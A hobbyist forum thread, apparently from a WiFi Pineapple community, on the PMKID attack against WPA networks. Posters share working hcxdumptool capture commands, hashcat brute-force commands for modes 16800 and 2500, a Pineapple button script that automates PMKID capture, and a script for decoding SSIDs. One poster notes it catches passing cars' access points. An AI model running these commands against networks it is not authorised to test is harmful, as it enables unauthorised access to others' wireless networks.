Jump to content
Zylla

PMKID Attack on WiFi Pineapples

Recommended Posts

5 minutes ago, Zylla said:

So just a heads up that it might be a while until updates are coming, and the module i had started working on.

Ahhh man that sucks, hopefully you get back on track ASAP. Enjoy the break away from keyboard? ?

Share this post


Link to post
Share on other sites
9 hours ago, Just_a_User said:

Ahhh man that sucks, hopefully you get back on track ASAP. Enjoy the break away from keyboard? ?

Thanks. I'm hoping to get back on track asap. ?

@Sleezybax
That'd be really helpful. I got some components myself that could boost performance, like RAM and SSD-disks laying around.
I'm not looking for a beast-laptop for gaming and such. But still something that's stable and works.
Like, if i was to purchase a new one today in the stores, i'd probably focus on the CPU.
Do you have any details on the "asset" you mentioned? ?
Thanks a lot for attempting to help out ? 

  • Like 1

Share this post


Link to post
Share on other sites

Ok once i've captured a .pcapng file how can I find out what SSIDs it has captured details for?   Or do I have to manually compare BSSIDs?

Share this post


Link to post
Share on other sites
2 minutes ago, PixL said:

Ok once i've captured a .pcapng file how can I find out what SSIDs it has captured details for?   Or do I have to manually compare BSSIDs? 

When you convert to *.16800 you can cat the file and see each MAC/BSSID but no ESSID.

I started using filters to be more targeted against my test AP's

e.g.

hcxdumptool -o /root/PMKIDS/local.pcapng -i wlan1mon --enable_status 4 --filterlist /root/targetlist.txt --filtermode 2

This thing is so fast it can pick up car AP;s before they are out of range if your not careful ?

Share this post


Link to post
Share on other sites
19 minutes ago, Just_a_User said:

This thing is so fast it can pick up car AP;s before they are out of range if your not careful ?

Only thing limiting it would be which channel it was scanning at the time I guess.

Share this post


Link to post
Share on other sites
2 minutes ago, PixL said:

Only thing limiting it would be which channel it was scanning at the time I guess.

yup, default is 5s per chan but can be dialed down further.

Share this post


Link to post
Share on other sites

What i'm unsure of is if there is any difference to using:

1.hcxpcaptool -z test.16800 test.pcapng   then using   hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

or

2. hcxpcaptool -o test.hccapx test.pcapng    then using hashcat -m 2500 test.hccapx -a 3 -w 3 '?l?l?l?l?l?lt!'

Share this post


Link to post
Share on other sites
7 hours ago, PixL said:

What i'm unsure of is if there is any difference to using:

1.hcxpcaptool -z test.16800 test.pcapng   then using   hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

or

2. hcxpcaptool -o test.hccapx test.pcapng    then using hashcat -m 2500 test.hccapx -a 3 -w 3 '?l?l?l?l?l?lt!'

hashcat forum thread says

Quote

There's also support for hash-mode 16801, which allows skipping the computation of the PMK - which is the computation that makes cracking WPA so slow.

 

Share this post


Link to post
Share on other sites

Just_a_User: 

 

Actually this is not what I mean, 16801 means you supply hashcat with pre-hashed PMKs as hex strings.  My above question is about 16800 which is expecting normal text file of passwords.

Share this post


Link to post
Share on other sites
1 hour ago, PixL said:

Just_a_User: 

 

Actually this is not what I mean, 16801 means you supply hashcat with pre-hashed PMKs as hex strings.  My above question is about 16800 which is expecting normal text file of passwords.

Oh shoot my bad,  All i found so far is hash-mode 16800 = WPA-PMKID-PBKDF2.

Edited by Just_a_User

Share this post


Link to post
Share on other sites
22 hours ago, PixL said:

Ok once i've captured a .pcapng file how can I find out what SSIDs it has captured details for?   Or do I have to manually compare BSSIDs?

Ok i've answered my own question, take the converted test.16800 file, open in notepad and then copy the last column from each line (delimited by *) and run it from hex to ascii...... voila you get your SSID.

  • Like 1

Share this post


Link to post
Share on other sites
On 8/22/2018 at 10:34 PM, Just_a_User said:

Just a note, new version on tetra is backin action and the filters work a treat ? this thing is so, so fast its amazing really. And perfect for the pineapples button script

#!/bin/bash
file="/tmp/handshake"
capture="`head -30 /dev/urandom | tr -dc "0123456789" | head -c3`"
if [ -f "$file" ]
then
        killall hcxdumptool
        led YELLOW off
        rm -rf /tmp/handshake
        hcxpcaptool -z test.16800 test.pcapng > test.conlog
        mv test.pcapng /root/$capture.pcapng
        mv test.16800 /root/$capture.16800
        mv test.conlog /root/$capture.conlog
        mv test.log /root/$capture.log

else
        touch /tmp/handshake
        led YELLOW on
        hcxdumptool -o test.pcapng -t 2 -i wlan1mon --enable_status=3 --disable_deauthentications --disable_disassociations > test.log &
fi

1. Click once and it starts capturing PMKID and light yellow LED

2. Click again and it stops capturing, converts the data to 16800 and moves them to /root/random.pcapng and /root/random.16800, turns off yellow LED and dumps a /root/random.log with the hcxdumptool output and random.conlog with the hcxpcaptool output.

Edited by PixL
  • Like 1

Share this post


Link to post
Share on other sites

Ok so i've made a small script to convert the hex encoded SSID back to text... can anyone improve on this and maybe make something that will take a list of PMKIDs and convert to a list of SSIDs?

#!/bin/bash
function hex2string () {
  I=0
  while [ $I -lt ${#1} ];
  do
    echo -en "\x"${1:$I:2}
    let "I += 2"
  done
}
read -p 'Hexstring: ' varname
hex2string "$varname"

 

Share this post


Link to post
Share on other sites

Hey guys,

Has anyone actually tried installing this in OS like Kali, Ubuntu?

If so, can you tell me what version of the OS worked for you?   I simply can't get this to work on Kali or Ubuntu. (raspberry pi 3b+ version)

thanks!

 

Share this post


Link to post
Share on other sites

@Zylla

Sorry for the late reply, got hit by RL. Had a dig through the basement, was sure i still had a lenovo t420 laying around. Turns out all i got left of old stuff is an acer something with just a i3 in it. So if CPU is what you are looking for i doubt this one will be worth shipping.

Share this post


Link to post
Share on other sites
On 9/2/2018 at 7:05 PM, cheeto said:

Hey guys,

Has anyone actually tried installing this in OS like Kali, Ubuntu?

If so, can you tell me what version of the OS worked for you?   I simply can't get this to work on Kali or Ubuntu. (raspberry pi 3b+ version)

thanks!

 

It was working perfectly on my Kali installation, until my laptop died. 

I have an RPI3B+, and I haven't tested it there myself, it should be working on it according to the developer. (ZerBea) 

Check if you have all dependencies installed before compiling. ?

Share this post


Link to post
Share on other sites

Thanks for this! I had some good fun with a friend creating a module to expose these tools on the Nano today. I'll see if I can tidy it up in to something presentable for the end of the week.

Share this post


Link to post
Share on other sites

I would also like to notify people (since it's been discussed earlier in the thread) that i was able to cmopile this without any problems on my Raspberry Pi 3b+.
And it's working perfectly. ?

Share this post


Link to post
Share on other sites

FYI, I don't seem to be getting any successful captures on the most recent packages you uploaded. I'm just testing the previous version to see if I've done something weird on my Pineapple.

Share this post


Link to post
Share on other sites
12 hours ago, Zylla said:

I would also like to notify people (since it's been discussed earlier in the thread) that i was able to cmopile this without any problems on my Raspberry Pi 3b+.
And it's working perfectly. ?

Congrats!!!

You wouldn't happen to have the link to the version of Kali that works on the Raspberry Pi 3b+,

I have Kali on my 3b+ but i think it's a patched up version.

It's my understanding that there is no official version of Kali  for 3b+.  Instead it's a modified version from the RP 3.  Right?

Also, Doesn't PMKID require more GPU?  If that's the case, i would imagine that's it's pretty slow on the the Nano ans the RP3b+.

 

Thanks!!

Share this post


Link to post
Share on other sites
5 hours ago, cheeto said:

Congrats!!!

You wouldn't happen to have the link to the version of Kali that works on the Raspberry Pi 3b+,

I have Kali on my 3b+ but i think it's a patched up version.

It's my understanding that there is no official version of Kali  for 3b+.  Instead it's a modified version from the RP 3.  Right?

Also, Doesn't PMKID require more GPU?  If that's the case, i would imagine that's it's pretty slow on the the Nano ans the RP3b+.

 

Thanks!!

Kali is based on Debian, the only "modified versions" I can think of is the images you can download containing the Nexmon patches, making you able to run wlan0 in monitor-mode (and AP mode at the same time) 

But that's just a kernel patch. 

Here's link for a great version: https://re4son-kernel.com/re4son-pi-kernel/

And yeah, same with the Pineapple. You don't use hashcat on these devices to crack the PMKID, you transfer the captures from the device to your desktop which hopefully has a GPU or something ?

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...